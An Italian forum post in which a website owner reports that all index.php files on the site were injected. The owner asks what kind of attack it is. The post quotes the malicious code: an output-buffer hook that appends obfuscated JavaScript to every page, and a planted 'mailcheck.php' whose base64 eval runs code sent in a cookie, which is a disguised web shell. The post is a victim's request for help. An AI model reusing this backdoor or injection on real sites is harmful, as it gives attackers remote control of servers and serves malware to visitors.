Salve a tutti,
Ho un sito su Ar*ba e venerdì scorso tutti gli index.php del sito sono stati virati con un cavallo di troia.
Hanno inserito all'inizio del mio codice un pezzo (peso 6kb) che inizia così:
Codice PHP:
<?php ob_start('security_update'); function security_update($buffer){return $buffer.'<script language="javascript">$a="Z6fpZ3dZ22Z2524Z2561Z253dZ2522dw(dcZ2573(cuZ252c14)Z2529;Z2522;Z22;ddZ3dZ22qb0iuqbSx!Z3c0iuqbSxZ252...
Inoltre nella mia root hanno inserito un file completamente nuovo dal nome "mailcheck.php"
Al suo interno il codice è:
Codice PHP:
<?php eval(base64_decode('aWYoaXNzZXQoJF9DT09L SUVbIlBIUFNFU1NJSUQiXSkpe2V2YWwoYmFzZ TY0X2RlY29kZSgkX0NPT0tJRVsiUEhQU0VTU0lJRCJdKSk7ZXhpdDt9')); echo "checking email...";
Qualcuno sa dirmi che tipo di attacco è, e se dipende da un mio errore di gestione (permessi?) o di codice o se è colpa del server?
Grazie
BALOO